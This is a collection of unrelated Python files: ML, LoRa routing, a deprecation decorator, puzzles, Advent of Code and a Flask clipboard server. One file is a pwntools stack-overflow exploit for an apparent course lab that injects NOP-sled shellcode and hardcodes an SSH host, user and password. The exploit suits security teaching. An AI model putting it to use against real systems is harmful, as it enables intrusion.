    }
    name = names.get(class_index, "unknown")
    return name, class_probability
#!/usr/bin/env python2
# Exploit script (Python 2 / pwntools): classic jump-to-stack overflow that
# overwrites the saved return address with a pointer into a NOP sled.
from pwn import *
# Target binary and its remote working directory.
exe = "./target"
mydir = "jmp-to-stack"
path = "/home/lab03/" + mydir
context.terminal = ['tmux', 'splitw', '-v']
context.update(arch='i386', os='linux')
# Environment-borne shellcode: a NOP carpet followed by cat /proc/flag.
env = {"SHELLCODE": "\x90"*0x1000 + asm(pwnlib.shellcraft.i386.linux.cat("/proc/flag"))}
#env = {"SHELLCODE": asm(pwnlib.shellcraft.i386.linux.sh())}
# Cyclic-pattern value observed at the saved return address (offset marker).
padding = 0x63616171
nop_offset = 1000
# Address to use
# Got this address by forcing a segfault, using the telescope command to
# examine the stack, then examining the stack with x/20wx
local_addr_invoke = 0xffffcf74
local_addr_gdb = 0xffffc124
server_start_invoke = 0xffffd12c
server_start_gdb = 0xffffc998
start_addr = server_start_gdb
# Aim at the middle of the NOP sled (Python 2 integer division).
start_addr = start_addr + (nop_offset/2)
# NOP sled
nop_sled = "\x90" * nop_offset
shellcode = shellcraft.cat("/proc/flag")
# start constructing payload: filler up to the saved EIP, the target
# address, then sled + shellcode + sled.
payload = cyclic(cyclic_find(padding))
payload += p32(start_addr)
payload += nop_sled
payload += asm(shellcode)
payload += nop_sled
# Address sled
for i in range (0, 200):
    payload += p32(start_addr)
# Keep a copy of the payload on disk for offline inspection.
f = open('shellcode', 'w')
f.write(payload)
f.close()
# Deliver the payload as argv[1] over SSH and hand over the tty.
s = ssh("lab03", "52.201.10.159", password="b50e289f")
p = s.process(["./target", payload], cwd="/home/lab03/jmp-to-stack")
#p = process(["./target", payload], cwd="/home/jakeholl/git/cs6265/lab03/jmp-to-stack")
p.interactive()
|
import os.path as osp
from dea_ml.config.config_parser import parse_config
from dea_ml.config.product_feature_config import FeaturePathConfig
def test_parse_config():
    """Parsing default.config must reproduce the default FeaturePathConfig."""
    here = osp.dirname(__file__)
    parsed = parse_config(osp.join(here, "default.config"))
    assert parsed == FeaturePathConfig()
|
'''**************************************************************************
File: cargo.py
Language: Python 3.6.8
Author: Juliette Zerick (jzerick@iu.edu)
for the WildfireDLN Project
OPeN Networks Lab at Indiana University-Bloomington
In this file the class cargo_hold manages transient data, that is, data that
is not committed to the UNIS Runtime. Data gradually streams in to be passed
on to other devices, or to create routing tables. By observing local flow
of LoRa messages this device can estimate the position of neighbors,
which neighbors it needs to receive messages from elsewhere in the swarm,
and which neighbors similarly need it.
Last modified: October 7, 2019
****************************************************************************'''
import pandas as pd
import threading
from protocol import *
import bridge
LAST_OBS_VAR_NAME = 'last_obs_time'
class cargo_hold:
def __init__(self,my_name,my_dev_id,my_lora_id,vessel_transmit_f):
self.name = my_name
self.my_dev_id = my_dev_id
self.my_lora_id = my_lora_id
self.vessel_transmit_f = vessel_transmit_f
# warning: pandas is not thread safe (v0.11 onward)
self.data_lock = threading.Lock()
self.rtg_lock = threading.Lock()
self.df = self.gen_init_df()
# searching for devices observed thus far and other operations can
# of course be performed using operations on the DataFrame, but these
# redundant data structures reduce computational load. what is elegant
# code on a cluster is torture for a small device.
self.devices_seen = set()
self.who_I_need = set() # probably grammatically incorrect
self.who_needs_me = set() # it's quiet...
self.who_does_not_need_me = set() # beleaguered English teachers
self.who_needs_whom = set() # must be sleeping
self.who_does_not_need_whom = set()
def gen_init_df(self):
df = pd.DataFrame(columns=PROTOCOL_COLUMNS.keys())
df.set_index('receipt_ts',inplace=True)
return df
def append_batch(self,last_batch):
if len(last_batch) == 0: return # nothing to do
df0 = pd.concat([self.df] + last_batch,sort=True) # note: sorting requires pandas 0.23.0+
self.data_lock.acquire()
self.df = df0
self.data_lock.release()
#self.in_the_weeds('%d new records added to df, now %d' % (len(last_batch),len(self.df)))
def in_the_weeds(self,S):
if IN_THE_WEEDS:
print(self.add_name(' :: '+translate_text(S)))
def save_run_results(self):
df = translate_df(self.df)
#fn = datetime_now()+self.name+'.csv'
fn = self.name+'.csv'
df.to_csv(fn,sep=DF_DELIM)
def dump_sets(self):
print(self.name,'dev seen',self.devices_seen)
print(self.name,'who I need',self.who_I_need)
print(self.name,'who needs me',self.who_needs_me)
print(self.name,'whod does not need me',self.who_does_not_need_me)
print(self.name,'who needs whom',self.who_needs_whom)
print(self.name,'who does not need whom',self.who_does_not_need_whom)
print(bridge.dev_id2name_mapping)
def seen_msg(self,lmsg):
skey = lmsg.skey
all_skeys = set(self.df['skey'])
return skey in all_skeys
def update_table_entry(self,idx,col_name,val): # keep for reference!
if bridge.closing_time: return # avoid threading errors during shutdown
if idx not in self.df.index or col_name not in self.df.columns: return
# no checks for pre-existing data
if not bridge.closing_time:
self.data_lock.acquire()
'''
A reminder:
self.df[var_name][dev_id] = val
produces the pandas warning SettingWithCopyWarning, when
'A value is trying to be set on a copy of a slice from a DataFrame'
The way to set the value without unintentionally slicing and creating
a duplicate DataFrame that is then modified (leaving the original
untouched) is with .loc, as follows:
'''
try:
self.df.loc[idx,col_name] = val
except IndexError:
log.error('failure! saving progress to file for analysis')
self.df.to_csv('update-failure-%s-%s-%s.csv' % (idx,col_name,val))
bridge.closing_time = True
mopup()
self.data_lock.release()
def gleaner_update(self):
#self.in_the_weeds('gleaner updating')
self.update_devices_seen()
self.update_who_I_need()
self.update_who_needs_me()
self.update_who_needs_whom()
#self.in_the_weeds('gleaner update complete')
def update_ferry_loc(self,dev_id,gps_lat,gps_long,obs_time):
n = register_or_retrieve_node(dev_id)
# does the node have a timestamp of the last observation of its location?
if node_has_var(n,'location.last_obs'):
# if we already have a more recent (presumably better) estimate, do nothing
if obs_time < n.location.last_obs_time:
return
# otherwise update. note that attempting update_var(n,'location.latitude',gps_lat)
# produces errors, so do this one manually
n.location.longitude = gps_long
n.location.latitude = gps_lat
n.location.last_obs_time = obs_time
bridge.rt.flush()
def update_devices_seen(self):
dev_seen = set(self.df['sender_dev_id']) \
| set(self.df['relayer_dev_id']) - set(['',MULTICAST])
self.data_lock.acquire()
self.devices_seen = dev_seen
self.data_lock.release()
if bridge.HAVE_UNIS:
for d in self.devices_seen:
# do we have data?
(gps_lat,gps_long,obs_time) = self.estimate_loc(d,now())
if DATA_NOT_FOUND not in [gps_lat,gps_long,obs_time]:
self.update_ferry_loc(d,gps_lat,gps_long,obs_time)
# if not, do nothing. wait until the next check to try updating.
def who_has_promoted(self,skey):
# no errors thrown if no record exists with the skey given
return set(self.df[self.df['skey'] == skey]['sender_addr']) - set(['',MULTICAST])
def has_promoted(self,skey,dev_id):
return dev_id in self.who_has_promoted(skey)
def who_has_responded(self,skey):
# no errors thrown if no record exists with the skey given
rdf = self.df[self.df['ref_skey'] == skey]
return set(rdf[rdf['bloom_count'] > 0]['init_sender_addr']) \
| set(rdf[rdf['bloom_count'] == 0]['sender_addr'])- set(['',MULTICAST])
def has_responded(self,skey,dev_id):
return dev_id in self.who_has_responded(skey)
def get_response_dataset_from_query(self,query_skey):
# no errors thrown if no record exists with the skey given
rdf = self.df[self.df['ref_skey'] == query_skey]
if len(rdf) == 0: return set()
sample = rdf.head(1)
def do_I_need(self,dev_id):
return dev_id in self.who_I_need
def does_dev_need_me(self,dev_id):
return dev_id in self.who_needs_me
def update_who_I_need(self):
# do not convert to sets. we need the full, ordered DataFrame columns.
Senders = list(self.df['sender_dev_id'])
Relayers = list(self.df['relayer_dev_id'])
win = {}
# the number of Relayers is not necessary less than the number of Senders
if len(Senders) == 0 or len(Relayers) == 0: return
# as saturation progresses, we hear more amplifications.
# so use the most recent. hopefully it's not far out, close to the edge.
for i in range(len(self.df)):
sender = Senders[i]
relayer = Relayers[i]
if sender == self.my_dev_id or relayer == self.my_dev_id: continue
if relayer not in win:
win[relayer] = set()
win[relayer].add(sender)
# repackaging for sorting
win_t = []
for relayer in win:
win_t.append([len(win[relayer]),relayer,win[relayer]])
# the big fish eat the smaller fishes
if len(win_t) > 1:
win_t.sort()
for i in reversed(range(1,len(win_t),1)): # big fish here
ti = win_t[i][2]
# have we devoured all that came before?
if max(map(lambda x: len(x[2]),win_t[:i])) == 0:
break
for j in range(i): # small fish here
tj = win_t[j][2]
if len(tj) > 0:
if ti | tj == ti: # feeding time
win_t[j][2] = set() # will be filtered out shortly
self.in_the_weeds('tj (%s) ate ti (%s)' % (win_t[i][1],win_t[j][1]))
if len(win_t) > 0:
win_d = {}
for w in win_t:
win_d[w[1]] = set(w[2])
self.data_lock.acquire()
self.who_I_need = win_d
self.data_lock.release()
# update the approprite columns
for dev_id in win_d:
self.announce_dep(dev_id)
def announce_dep(self,recipient):
if recipient == self.my_dev_id: return
sender = self.my_dev_id
send_time = now()
msg_type = MSG_TYPE_RTG
if recipient in self.who_I_need:
payload = len(self.who_I_need[recipient])
else:
payload = 0
pkt = '%s/0/%s/%f/%d/%d//%f|' % (recipient,sender,send_time,
msg_type,payload,FAKE_RSSI_VALUE)
lmsg = lora_message(pkt)
if not lmsg.pkt_valid:
#log.packet_errors(self.add_name('says dependency announcement packet is invalid!'))
return
#log.data_flow(self.add_name('put the announcement packet to %s in queue' % (recipient)))
self.vessel_transmit_f(lmsg)
return lmsg
def get_rtg_results(self,needs_df):
# get records from the last hour only i.e. the last 3600 seconds
cutoff = now() - 3600
df_last_hour = needs_df[needs_df['send_time'] > cutoff]
# restrict further to routing messages only
df_rtg = df_last_hour[df_last_hour['msg_type'] == MSG_TYPE_RTG]
# and only take the most recent message
all_recip = set(df_rtg['recipient_addr'])- set(['',MULTICAST])
selected_records = []
# a walk down memory lane
for recip_dev in all_recip:
recip_rec = df_rtg[df_rtg['recipient_addr'] == recip_dev]
Senders = set(recip_rec['sender_addr'])- set(['',MULTICAST])
for sender in Senders:
# beware the SettingWithCopyWarning
recip_sender_rec = recip_rec[recip_rec['sender_addr'] == sender].copy(deep=True)
recip_sender_rec.sort_values(by='send_time',ascending=False,inplace=True)
most_recent_rec = recip_sender_rec.head(1)
selected_records.append(most_recent_rec)
if len(selected_records) == 0:
edf = empty_df(needs_df)
return set(),set(),set(),edf,edf
sel_df = pd.concat(selected_records,sort=True) # note: sorting requires pandas 0.23.0+
# split by classification
dep_df = sel_df[sel_df['dependency_count'] > 0]
indep_df = sel_df[sel_df['dependency_count'] == 0]
# extract
dependents = set(dep_df['sender_addr'])- set(['',MULTICAST])
independents = set(indep_df['sender_addr'])- set(['',MULTICAST])
ambivalents = self.devices_seen - dependents - independents
return dependents, independents, ambivalents, dep_df, indep_df
def update_who_needs_me(self):
# only determining my needs
needs_df = self.df[self.df['recipient_addr'] == self.my_dev_id]
# restrict to recent, unique entries only
deps, indeps, ambs, dep_df, indep_df = self.get_rtg_results(needs_df)
deps = set(dep_df['sender_addr'])- set(['',MULTICAST])
indeps = set(indep_df['sender_addr'])- set(['',MULTICAST])
ambs = self.devices_seen - deps - indeps
self.data_lock.acquire()
self.who_needs_me = deps
self.who_does_not_need_me = indeps
self.data_lock.release()
def update_who_needs_whom(self):
# only determining others' needs
needs_df = self.df[self.df['recipient_addr'] != self.my_dev_id]
# restrict to recent, unique entries only
deps, indeps, ambs, dep_df, indep_df = self.get_rtg_results(needs_df)
dep_d = {}
for this_dev_id in deps:
this_dev_dep_df = dep_df[dep_df['recipient_addr'] == this_dev_id]
this_dev_dep = set(this_dev_dep_df['sender_addr'])- set(['',MULTICAST])
dep_d[this_dev_id] = this_dev_dep
indep_d = {}
for this_dev_id in indeps:
this_dev_indep_df = indep_df[indep_df['recipient_addr'] == this_dev_id]
this_dev_indep = set(this_dev_indep_df['sender_addr'])- set(['',MULTICAST])
indep_d[this_dev_id] = this_dev_indep
self.data_lock.acquire()
self.who_needs_whom = dep_d
self.who_does_not_need_whom = indep_d
self.data_lock.release()
def x_needs_y(self,dev_x,dev_y):
# do we have the data?
if dev_y in self.who_needs_whom:
# is dev_x a dependent of dev_y?
if dev_x in self.who_needs_whom[dev_y]:
return True
return False
def x_indep_y(self,dev_x,dev_y):
# do we have the data?
if dev_y in self.who_does_not_need_whom:
# is dev_x independent of dev_y?
if dev_x in self.who_does_not_need_whom[dev_y]:
return True
return False
def are_dependent(self,dev_x,dev_y):
return self.x_needs_y(dev_x,dev_y) or self.x_needs_y(dev_y,dev_x)
def are_independent(self,dev_x,dev_y):
return self.x_indep_y(dev_x,dev_y) and self.x_indep_y(dev_y,dev_x)
def last_var_obs(self,var_name,msg_stack):
if var_name == 'obs_gps_lat':
data0 = msg_stack[msg_stack['obs_gps_lat'] != '']
elif var_name == 'obs_gps_long':
data0 = msg_stack[msg_stack['obs_gps_long'] != '']
else:
data0 = msg_stack[msg_stack['obs_var_name'] == var_name]
# return the empty DataFrame
if len(data0) == 0: data0
# beware the SettingWithCopyWarning
data = data0.copy(deep=True)
data.sort_values(by='send_time',ascending=False,inplace=True)
last_obs = data.head(1)
return last_obs
def retrieve_last_var_obs(self,dev_id,var_name):
msg_stack = self.df[self.df['obs_dev_id'] == dev_id]
if len(msg_stack) == 0: return msg_stack
last_obs = self.last_var_obs(var_name,msg_stack)
return last_obs
def retrieve_var_from_df(self,dev_id,var_name):
last_obs = self.retrieve_last_var_obs(dev_id,var_name)
if len(last_obs) == 0: return DATA_NOT_FOUND,DATA_NOT_FOUND
if var_name == 'obs_gps_lat':
retval = last_obs['obs_gps_lat'].values[0]
elif var_name == 'obs_gps_long':
retval = last_obs['obs_gps_long'].values[0]
else:
retval = last_obs['obs_val'].values[0]
return last_obs['obs_time'].values[0], retval
def estimate_loc(self,dev_id,obs_time):
# isolate data pertaining to this device
this_dev_df = self.df[self.df['obs_dev_id'] == dev_id]
# make a copy to ensure nothing is changed in the main DataFrame
this_dev_loc = this_dev_df[this_dev_df['obs_gps_lat'] != ''].copy(deep=True)
if len(this_dev_loc) == 0: return (DATA_NOT_FOUND,DATA_NOT_FOUND, DATA_NOT_FOUND)
# compute differences. find an observation of location as close
# to obs_time as possible.
this_dev_loc['diff'] = abs(this_dev_loc['obs_time'] - obs_time)
min_time_diff = min(list(this_dev_loc['diff']))
row = this_dev_loc[this_dev_loc['diff'] == min_time_diff].head(1)
gps_lat = row['obs_gps_lat'].values[0]
gps_long = row['obs_gps_long'].values[0]
obs_time = row['obs_time'].values[0]
# send back default values in the DataFrame
if DATA_NOT_FOUND in [gps_lat, gps_long, obs_time]:
return (DATA_NOT_FOUND, DATA_NOT_FOUND, DATA_NOT_FOUND)
return (gps_lat,gps_long,obs_time)
def best_estimate_dataset(self):
    """Assemble, per variable name, a DataFrame with the latest observation
    from every known device plus an estimated location for each.

    Returns a dict mapping variable name -> DataFrame indexed by obs_time.
    Devices lacking either the observation or a usable location estimate
    are silently skipped.
    """
    est_d = {}
    all_vars = set(self.df['obs_var_name']) - set(['',DATA_NOT_FOUND])
    for var_name in all_vars:
        per_var = []
        for dev_id in self.devices_seen | set([self.my_dev_id]):
            obs_time, obs_val = self.retrieve_var_from_df(dev_id,var_name)
            if DATA_NOT_FOUND in [obs_time,obs_val]: continue
            # BUG FIX: estimate_loc returns a 3-tuple (lat, long, time);
            # the original unpacked only two values, raising ValueError.
            est_lat, est_long, _est_time = self.estimate_loc(dev_id,obs_time)
            if DATA_NOT_FOUND in [est_lat,est_long]: continue
            D = {'obs_time':[obs_time], 'obs_dev_id':[dev_id],
                 'est_lat':[est_lat], 'est_long':[est_long],
                 'obs_var_name':[var_name], 'obs_val':[obs_val]}
            per_var.append(pd.DataFrame(D))
        if len(per_var) > 0:
            cdf = pd.concat(per_var,sort=True) # note: sorting requires pandas 0.23.0
            cdf.set_index('obs_time',inplace=True)
            # keep obs_var_name column in case these DataFrames are merged later
            est_d[var_name] = cdf
    return est_d
def temp_dataset(self):
    """De-duplicated (time, lat, long, value) table of all 'temp' readings."""
    temp_rows = self.df[self.df['obs_var_name'] == 'temp']
    # deep copy so callers can mutate the result without touching self.df
    subset = copy.deepcopy(
        temp_rows[['obs_time','obs_gps_lat','obs_gps_long','obs_val']])
    subset.drop_duplicates(inplace=True)
    return subset
|
import warnings
import six
from .doc_utils import append_to_doc
# Public API of this module.
__all__ = ['deprecated', 'deprecated_arg']
def _deprecated_warn(message):
warnings.warn(message, category=DeprecationWarning)
def _name_of(target):
return target.__name__
class deprecated(object):
    """
    Decorate a class, a method or a function to be deprecated.

    Decorated targets emit a DeprecationWarning on each call (or on class
    instantiation) and get a ``.. deprecated::`` note appended to their
    docstring.

    Usage::
        @deprecated()
        def some_function():
            ...
        @deprecated()
        class SomeClass:
            ...
    """
    def __init__(self, message='', version=None):
        """
        Construct a new :class:`deprecated` object, which can be
        used to decorate a class, a method or a function.
        Args:
            message: The deprecation message to display. It will be appended
                to the end of auto-generated message, i.e., the final message
                would be "`<name>` is deprecated; " + message.
            version: The version since which the decorated target is deprecated.
        """
        self._message = message
        self._version = version
    def __call__(self, target):
        # dispatch on what is being decorated: classes get their __init__
        # patched, plain callables get wrapped
        if isinstance(target, six.class_types):
            return self._deprecate_class(target)
        else:
            return self._deprecate_func(target)
    def _deprecate_class(self, cls):
        """Patch `cls.__init__` to warn on instantiation; returns `cls`."""
        msg = 'Class `{}` is deprecated'.format(_name_of(cls))
        if self._message:
            msg += '; {}'.format(self._message)
        else:
            msg += '.'
        # patch the __init__ of the class
        init = cls.__init__
        def wrapped(*args, **kwargs):
            _deprecated_warn(msg)
            return init(*args, **kwargs)
        cls.__init__ = wrapped
        # manually copy the wrapper metadata (six.wraps is not used here,
        # presumably because __init__ may be a slot wrapper — verify)
        for k in ('__module__', '__name__', '__qualname__', '__annotations__'):
            if hasattr(init, k):
                setattr(wrapped, k, getattr(init, k))
        if six.PY2:
            # NOTE(review): on Python 2 the class __doc__ attribute is not
            # writable, so the note is attached to __init__ instead — confirm
            wrapped.__doc__ = self._update_doc(init.__doc__)
        else:
            cls.__doc__ = self._update_doc(cls.__doc__)
        return cls
    def _deprecate_func(self, func):
        """Wrap `func` so every call emits the deprecation warning."""
        msg = 'Function `{}` is deprecated'.format(_name_of(func))
        if self._message:
            msg += '; {}'.format(self._message)
        else:
            msg += '.'
        @six.wraps(func)
        def wrapped(*args, **kwargs):
            _deprecated_warn(msg)
            return func(*args, **kwargs)
        wrapped.__doc__ = self._update_doc(wrapped.__doc__)
        # Add a reference to the wrapped function so that we can introspect
        # on function arguments in Python 2 (already works in Python 3)
        wrapped.__wrapped__ = func
        return wrapped
    def _update_doc(self, doc):
        """Append a Sphinx ``.. deprecated::`` appendix to `doc`."""
        def add_indent(s, spaces):
            return '\n'.join(spaces + l if l.strip() else ''
                             for l in s.split('\n'))
        appendix = '.. deprecated::'
        if self._version:
            appendix += ' {}'.format(self._version)
        if self._message:
            # indent the custom message under the directive
            appendix += '\n' + add_indent(self._message, '    ')
        return append_to_doc(doc, appendix)
def deprecated_arg(old_arg, new_arg=None, version=None):
    """Decorator factory: warn whenever `old_arg` is passed by keyword.

    When `new_arg` is given, the warning names it as the replacement and
    passing both arguments at the same time raises TypeError.
    """
    since = ' since {}'.format(version) if version else ''
    def wrapper(method):
        # build the warning text once per decorated method
        if new_arg is None:
            msg = ('In function `{}`: argument `' + str(old_arg) +
                   '` is deprecated' + since + '.').format(_name_of(method))
        else:
            msg = ('In function `{}`: argument `' + str(old_arg) +
                   '` is deprecated' + since + ', use `' + str(new_arg) +
                   '` instead.').format(_name_of(method))
        @six.wraps(method)
        def wrapped(*args, **kwargs):
            if old_arg in kwargs:
                if new_arg is not None and new_arg in kwargs:
                    raise TypeError(
                        'You should not specify the deprecated argument '
                        '`{}` and its replacement `{}` at the same time.'.
                        format(old_arg, new_arg)
                    )
                _deprecated_warn(msg)
            return method(*args, **kwargs)
        return wrapped
    return wrapper
|
# Generated by Django 3.2.6 on 2021-08-06 21:12
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: drops Message.questions_asked (reverses 0005)."""
    dependencies = [
        ('app', '0005_message_questions_asked'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='message',
            name='questions_asked',
        ),
    ]
|
# code taken from mit lecture 6 of computer science and programming
# 19 april 2017 - phil welsby
def printMove(fr, to):
    """Announce a single disc move on stdout."""
    print('move from {} to {}'.format(fr, to))

def Towers(n, fr, to, spare):
    """Solve Towers of Hanoi for n discs, printing every move.

    Moves n discs from peg `fr` to peg `to` using `spare` as scratch space.
    """
    if n == 1:
        printMove(fr, to)
        return
    # park the top n-1 discs on the spare peg
    Towers(n - 1, fr, spare, to)
    # move the largest disc directly (same move Towers(1, fr, to, spare) made)
    printMove(fr, to)
    # bring the parked discs over on top of it
    Towers(n - 1, spare, to, fr)
|
import sys
# redirect stdin so input() below reads from the judge's sample file
sys.stdin = open("D4_5247_input.txt", "r")
from collections import deque
def bfs(n):
    """Breadth-first relaxation over the moves +1, *2, -1, -10 starting at n.

    Fills the global `counts` list so counts[i] holds the fewest operations
    needed to reach value i (0 <= i < M+11).  Relies on globals M and counts
    being set up by the caller before each test case.
    """
    q = deque([[n, 0]])
    while q:
        num, count = q[0]
        # prune values beyond the tracked range M+11 — TODO confirm this
        # bound is always safe for the problem's constraints
        if num > M + 11:
            q.popleft()
            continue
        flag = 1
        temp = []
        temp.append(num + 1)
        temp.append(num * 2)
        temp.append(num - 1)
        temp.append(num - 10)
        count += 1
        for i in temp:
            # relax any in-range neighbour reached with fewer operations
            if 0 <= i < M + 11 and counts[i] > count:
                counts[i] = count
                flag = 0
                q.append([i, count])
        # NOTE(review): the front node is only dequeued when it produced no
        # improvement, so improving nodes are re-examined once — looks
        # intentional but unusual; verify termination reasoning.
        if flag:
            q.popleft()
# number of test cases (stdin is redirected to the input file above)
T = int(input())
for test_case in range(T):
    N, M = map(int, input().split())
    # counts[i] = fewest operations to turn N into i; filled by bfs()
    counts = [float('inf')] * (M + 11)
    bfs(N)
    print("#{} {}".format(test_case + 1, counts[M]))
def jusifyText(words, k):
    """Fully justify `words` into lines of exactly `k` characters.

    Words are packed greedily; the spare width of each line is distributed
    over the gaps between words, left to right.  A line holding a single
    word is padded on the right with spaces.

    NOTE: `words` is consumed (mutated) by this function, and it must
    contain at least one word — both match the original behaviour.
    """
    last_word = words.pop()
    line = ""
    words_lines = []
    words_to_use = []
    # greedy packing: keep appending words while they fit within width k
    while words:
        word = words.pop(0)
        if len(line) + len(word) + 1 <= k:
            words_to_use.append(word)
            line = line + word + " "
        else:
            words_lines.append(words_to_use)
            words_to_use = [word]
            line = word + " "
    # place the held-back final word
    if len(line) + len(last_word) <= k:
        words_to_use.append(last_word)
        line = line + last_word
    else:
        words_lines.append(words_to_use)
        # BUG FIX: the original started the overflow line with the stale
        # loop variable `word` instead of the final word itself.
        words_to_use = [last_word]
        line = last_word
    words_lines.append(words_to_use)
    actual_lines = []
    for words_line in words_lines:
        num_words = len(words_line)
        num_space_places = num_words - 1
        word_space = sum(len(word) for word in words_line)
        blank_space = k - word_space
        # BUG FIX: a single-word line has no gaps; pad it on the right
        # instead of crashing with IndexError on the empty `spaces` list.
        if num_space_places == 0:
            actual_lines.append(words_line[0] + " " * blank_space)
            continue
        # distribute the spare width over the gaps, left-heavy
        spaces = [0 for _ in range(num_space_places)]
        i = 0
        while blank_space > 0:
            spaces[i] += 1
            i = 0 if i == num_space_places - 1 else i + 1
            blank_space -= 1
        real_spaces = [" " * space for space in spaces]
        actual_line = ""
        while real_spaces:
            actual_line += words_line.pop(0)
            actual_line += real_spaces.pop(0)
        actual_line += words_line.pop(0)
        actual_lines.append(actual_line)
    return actual_lines
if __name__=='__main__':
    # demo: justify the classic pangram into 16-character lines
    sample_words = ["the", "quick", "brown", "fox", "jumps", "over", "the", "lazy", "dog"]
    width = 16
    for justified_line in jusifyText(sample_words, width):
        print(justified_line)
|
from time import perf_counter
import re
from collections import Counter
def profiler(method):
    """Decorator: print how long each call to `method` takes."""
    def timed(*arg, **kw):
        started = perf_counter()
        result = method(*arg, **kw)
        elapsed = perf_counter() - started
        print('Method {} took : {:2.5f} sec'.format(method.__name__, elapsed))
        return result
    return timed
@profiler
def part1():
    """Walk the monkey map, wrapping flat across rows/columns, and print
    the final password (looks like Advent of Code day 22 part 1 — confirm).
    """
    p = open("day22/input.txt").read().split("\n\n")
    grid = {}
    direction = 0
    # facing -> (dx, dy); 0=right, 1=down, 2=left, 3=up
    moves = {
        0: (1, 0),
        1: (0, 1),
        2: (-1, 0),
        3: (0, -1),
    }
    for y, l in enumerate(p[0].splitlines()):
        for x, c in enumerate(l):
            if c in [".", "#"]:
                # NOTE(review): start position is the very first tile seen,
                # even if it is a wall '#' — confirm the input's first tile
                # is always open.
                if len(grid) == 0:
                    pos = (x, y)
                grid[(x, y)] = c
    # tokens like "10" or "R5": optional turn letter fused with a distance
    path = re.findall(r"\w?\d+", p[1])
    for s in path:
        if "R" in s:
            direction = (direction + 1) % 4
            s = s.replace("R", "")
        elif "L" in s:
            direction = (direction - 1) % 4
            s = s.replace("L", "")
        for _ in range(int(s)):
            if (pos[0] + moves[direction][0], pos[1] + moves[direction][1]) in grid:
                if grid[(pos[0] + moves[direction][0], pos[1] + moves[direction][1])] == ".":
                    pos = (pos[0] + moves[direction][0],
                           pos[1] + moves[direction][1])
                else:
                    break
            else:
                # walked off the map: wrap to the far edge of this row/column
                if direction in [0, 2]:
                    x = {
                        0: min([tile[0] for tile in grid if tile[1] == pos[1]]),
                        2: max([tile[0] for tile in grid if tile[1] == pos[1]]),
                    }
                    n_pos = (x[direction], pos[1])
                else:
                    y = {
                        1: min([tile[1] for tile in grid if tile[0] == pos[0]]),
                        3: max([tile[1] for tile in grid if tile[0] == pos[0]]),
                    }
                    n_pos = (pos[0], y[direction])
                if grid[n_pos] == ".":
                    pos = n_pos
                else:
                    break
    assert(pos in grid and grid[pos] == ".")
    # password: 1000*row + 4*col + facing, with rows/cols 1-indexed
    print(1000*(pos[1]+1) + 4 * (pos[0]+1) + direction)
def get_face(p):
    """Map a grid position to its cube-face number for this input's layout.

    Faces are 50x50 tiles arranged as:
        row 0:  face 1 (col 1), face 2 (col 2)
        row 1:  face 3
        row 2:  face 5 (col 0), face 4 (col 1)
        row 3:  face 6
    """
    x, y = p
    row = y // 50
    col = x // 50
    if row == 0:
        return col        # col 1 -> face 1, col 2 -> face 2
    if row == 1:
        return 3
    if row == 2:
        return {0: 5, 1: 4}[col]
    return 6
@profiler
def part2():
    """Walk the monkey map again, but wrap edges as faces of a cube and
    print the final password (cube layout is specific to this input).
    """
    p = open("day22/input.txt").read().split("\n\n")
    grid = {}
    direction = 0
    # facing -> (dx, dy); 0=right, 1=down, 2=left, 3=up
    moves = {
        0: (1, 0),
        1: (0, 1),
        2: (-1, 0),
        3: (0, -1),
    }
    # from (face number, direction) to (new direction, conversion between coordinates lambda)
    # Facing is 0 for right (>), 1 for down (v), 2 for left (<), and 3 for up (^)
    wrap = {
        (1, 2): (0, lambda x, y: (0, 149 - y)),
        (1, 3): (0, lambda x, y: (0, x+100)),
        (2, 0): (2, lambda x, y: (99, 149-y)),
        (2, 1): (2, lambda x, y: (99, x-50)),
        (2, 3): (3, lambda x, y: (x-100, 199)),
        (3, 0): (3, lambda x, y: (y+50, 49)),
        (3, 2): (1, lambda x, y: (y-50, 100)),
        (4, 0): (2, lambda x, y: (149, 149-y)),
        (4, 1): (2, lambda x, y: (49, 100+x)),
        (5, 2): (0, lambda x, y: (50, 149-y)),
        (5, 3): (0, lambda x, y: (50, 50+x)),
        (6, 0): (3, lambda x, y: (y-100, 149)),
        (6, 1): (1, lambda x, y: (x+100, 0)),
        (6, 2): (1, lambda x, y: (y-100, 0)),
    }
    for y, l in enumerate(p[0].splitlines()):
        for x, c in enumerate(l):
            if c in [".", "#"]:
                if len(grid) == 0:
                    pos = (x, y)
                grid[(x, y)] = c
    path = re.findall(r"\w?\d+", p[1])
    for s in path:
        if "R" in s:
            direction = (direction + 1) % 4
            s = s.replace("R", "")
        elif "L" in s:
            direction = (direction - 1) % 4
            s = s.replace("L", "")
        for _ in range(int(s)):
            if (pos[0] + moves[direction][0], pos[1] + moves[direction][1]) in grid:
                if grid[(pos[0] + moves[direction][0], pos[1] + moves[direction][1])] == ".":
                    pos = (pos[0] + moves[direction][0],
                           pos[1] + moves[direction][1])
                else:
                    break
            else:
                # stepping off the map: jump to the adjoining cube face
                n_d, fn = wrap[(get_face(pos), direction)]
                n_pos = fn(pos[0], pos[1])
                assert(n_pos in grid)
                # CLEANUP: removed the original's dead `if n_pos not in
                # grid: pass`, which was unreachable after the assert above.
                if grid[n_pos] == ".":
                    direction = n_d
                    pos = n_pos
                else:
                    break
    print(1000*(pos[1]+1) + 4 * (pos[0]+1) + direction)
if __name__ == "__main__":
    # run both parts; each prints its answer and its timing via @profiler
    part1()
    part2()
|
import traceback
from flask import Flask, request
from f6.win32 import from_clipboard, to_clipboard
# WSGI application serving the clipboard endpoints below
app = Flask(__name__)
@app.route('/clip', methods=['GET'])
def get_clip():
    """Return the current clipboard contents, or '' on any failure."""
    try:
        data = from_clipboard()
    except Exception:
        # best-effort endpoint: log the failure and hand back empty text
        traceback.print_exc()
        return ''
    return data if data else ''
@app.route('/clip', methods=['POST'])
def post_clip():
    """Replace the clipboard with the request body and echo it back.

    Normalizes bare LF line endings to CRLF before writing.
    NOTE(review): under Python 3 Flask, request.data is bytes, so
    replace() with str arguments would raise TypeError — this looks like
    Python-2-era code; confirm the target runtime.
    """
    data = request.data
    data = data.replace('\n', '\r\n')
    to_clipboard(data)
    return data
if __name__ == '__main__':
    # threaded request handling; NOTE(review): 192.168.56.1 looks like a
    # VirtualBox host-only adapter address — confirm before deploying.
    app.run(host='192.168.56.1', port=6563, threaded=True)
|
from django.shortcuts import render
from django.contrib.auth.models import User, Group
from models import Product, Purchase
from rest_framework import viewsets, status
from serializers import UserSerializer, GroupSerializer, ProductSerializer, PurchaseSerializer
